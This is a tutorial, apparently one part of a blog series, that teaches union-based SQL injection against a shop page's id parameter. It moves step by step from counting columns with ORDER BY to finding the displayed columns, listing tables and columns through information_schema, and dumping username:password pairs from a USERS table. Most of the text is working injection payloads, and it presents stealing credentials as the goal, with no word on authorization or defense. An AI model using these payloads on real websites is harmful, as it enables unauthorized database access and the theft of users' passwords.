Finding Exact Number Columns in Website
Once you know that website is vulnerable to SQL Injection, next step is to find exact number of columns in website database. Which you can know by running below query :
www.example.com/shop.php?id=6 ORDER BY <NUM>–
Now say website has 16 columns, which you don’t know then you can get it by using binary search approach. For example running below manner sequences:
www.example.com/shop.php?id=6 ORDER BY 10–
Result : Some page opens with data i.e. no error page.Then incrementing it by 10 i.e.
www.example.com/shop.php?id=6 ORDER BY 20–
and so on until you get below error message :
Unknown column ‘<NUM>’ in ‘order clause’
or any other custom message.Once you get the above error message, then it means you exceeded the exact column numbers so decrease it one by once until to error is gone. Last successful page means exact column count. Say you get 16 columns. Then last successful request executed must be :
www.example.com/shop.php?id=6 ORDER BY 16–
This steps will give exact number of columns in the database of website.
Finding Vulnerable Columns using UNION ALL clause.
Once you know the exact number of columns in database then you can get list of all vulnerable columns by running below query:
www.example.com/shop.php?id=6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–
This will result in some page and on that page some numbers will be displayed. Those are actually vulnerable columns. Now say 2, 4 and 8 are displayed on page. This means column 2, column 4 and column 8 are most vulnerable columns which can be used to run your own SQL queries.If above query execution shows normal web page as it usually displays then it means query is failed. Then we used field exploitation technqiue by inserting ‘-‘ in ID value. So the query will become something like below:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16–
Wow, now you have some numbers scattered over web page, which means vulnerable columns on website.
Test run to validate vulnerable columns
Now we have list of all vulnerable columns, next step will be validating that we are correct.Easiest way to validate is executing version() command in vulnerable column, for example, say column 2 was vulnerable:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16–
Now in place of 2 on web page you will get the version number displayed. Check this for all vulnerable columns.
Use information Schema to get Table Names
Now we know vulnerable columns of database, next step will be extracting table names from the database. This can be achieved by knowing concepts of Information schema.Learn more about information schema to extract table names here:
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html
http://dev.mysql.com/doc/refman/5.1/en/tables-table.html
Using information schema we can execute query as if we are administrators. So in order to extract table names we will run below query on column 2 (vulnerable column).
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema = database()–
Above query will give you complete list of tables present in the database. You know which table you need to search for Username and passwords :D.Step 6: Use information schema to get Column namesUsing the same concept used in step 5, we will use information schema to extract column names too.Learn more about Information Schema to extract column names:
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html
http://dev.mysql.com/doc/refman/5.1/en/columns-table.html
Now to extract column names from database, below query will work like Bulls Eye:
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.columns where table_schema = database()–
The above query will result into extracting all column names.Step 7: Use Information Schema concept to get column values of required tableWell till now we have table names, column names. Only thing left is data from tables. Now say we got some table as USERS which has column names USERNAME and PASSWORD. In order to extract data from USERS table below query is sufficient :
www.example.com/shop.php?id=-6 UNION ALL SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from USERS–
Above query will result into displaying usernames and passwords in below format username:password as 0x3a is hex value for ‘:’.That’s it guys, now you have username, password, table names, passwords. What else do you need.That’s all for today, we will continue to learn more about injection attacks in later tutorials.If you have any queries of doubts, feel free to ask.
